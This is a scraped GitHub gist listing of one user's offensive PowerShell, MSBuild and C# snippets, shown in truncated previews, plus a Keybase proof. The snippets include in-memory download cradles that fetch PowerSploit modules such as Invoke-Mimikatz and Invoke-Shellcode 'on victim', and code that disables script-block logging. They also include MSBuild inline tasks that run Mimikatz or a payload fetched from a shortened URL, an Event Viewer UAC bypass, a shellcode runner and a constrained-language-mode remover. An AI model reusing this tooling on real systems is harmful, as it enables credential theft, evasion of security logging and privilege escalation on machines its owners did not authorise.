Dave Hardy davehardy20

  • UK
View powertools-downloader.ps1
Remove-Module PowerView -ErrorAction SilentlyContinue
Remove-Module PowerUp -ErrorAction SilentlyContinue
$webclient = New-Object System.Net.WebClient
$url = "https://github.com/Veil-Framework/PowerTools/archive/master.zip"
$file = "$($env:TEMP)\PowerTools.zip"
$webclient.DownloadFile($url,$file)
#Unblock-File -Path $file
$targetondisk = "$([System.Environment]::GetFolderPath('MyDocuments'))\WindowsPowerShell\Modules"
New-Item -ItemType Directory -Force -Path $targetondisk | out-null
$shell_app=new-object -com shell.application
View powersploit-downloader.ps1
Remove-Module PowerSploit -ErrorAction SilentlyContinue
$webclient = New-Object System.Net.WebClient
$url = "https://github.com/mattifestation/PowerSploit/archive/master.zip"
$file = "$($env:TEMP)\PowerSploit.zip"
$webclient.DownloadFile($url,$file)
#Unblock-File -Path $file
$targetondisk = "$([System.Environment]::GetFolderPath('MyDocuments'))\WindowsPowerShell\Modules"
New-Item -ItemType Directory -Force -Path $targetondisk | out-null
$shell_app=new-object -com shell.application
$zip_file = $shell_app.namespace($file)
View in-memory-downloader.ps1
#Most Useful PowerSploit and PowerTools Modules that can be loaded into memory
# Use this line in PowerShell on victim to pull into memory the modules
#(New-Object Net.WebClient).DownloadString("https://gist.githubusercontent.com/davehardy20/a81fb1eaabf2512fce88/raw/0d92460eb8d43183d2ce42e3e7cfa367740426b6/in-memory-downloader.ps1")|iex
$downloadcradle = New-Object Net.WebClient
$modules = @(
"https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/VolumeShadowCopyTools.
davehardy20 / keybase.md
Created Jun 24, 2017
Android created Gist
View keybase.md

Keybase proof

I hereby claim:

  • I am davehardy20 on github.
  • I am davehardy20 (https://keybase.io/davehardy20) on keybase.
  • I have a public key ASCgZJlcOaliMj7vAQc2qT6UoN5TfANsZY9TzAg2WSAoLgo

To claim this, I am signing this object:

View bypass.xml
<?xml version="1.0"?>
<command>
<![CDATA[
function Invoke-WMIObfuscatedPSCommand
function invoke-bypass
{
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetField"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
davehardy20 / msbuilder.xml
Created Jul 27, 2017
MSBuild Execute Assembly From Environment Variable
View msbuilder.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuilder.xml -->
<!-- Populate the Env Var like this or many other ways: -->
<!-- $env:TheThingIs = (New-Object Net.Webclient).downloadstring('http://bit.ly/2tDkg2e') -->
<!-- This has the advantage of keeping the assembly out of the xml on disk if it were ever recovered -->
<!-- This is just a simple example... MSBuild is a rich scripting engine with lots of ability to customize the build process -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
davehardy20 / EventVwrBypass.cs
Created Jul 27, 2017
Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe
View EventVwrBypass.cs
using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using Microsoft.Win32;
/*
InstallUtil.exe C# version of Event Viewer UAC bypass
davehardy20 / katz.xml
Created Jul 27, 2017
MSBuild - Mimikatz - Server 2016
View katz.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"
davehardy20 / PoCPowerShellCoreShellcodeRunner.ps1
Created Jul 27, 2017
A simple PoC shellcode runner that works in PowerShell Core on Nano Server and demonstrates how to call Win32 APIs
View PoCPowerShellCoreShellcodeRunner.ps1
<#
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
#>
function Invoke-VirtualAlloc {
Param (
[IntPtr] $lpAddress,
[UInt32] $dwSize,
[UInt32] $flAllocationType,
View Remove-ConstrainedLanguageMode.psm1
function Remove-ConstrainedLanguageMode {
<#
.Synopsis
Set language mode for a powershell session to 'full'.
.Description
Set language mode for a powershell session to 'full'. Leverages 'InstallUtil'
and the Microsoft.Diagnostics.Runtime.dll resources to adjust in-memory values.
.Example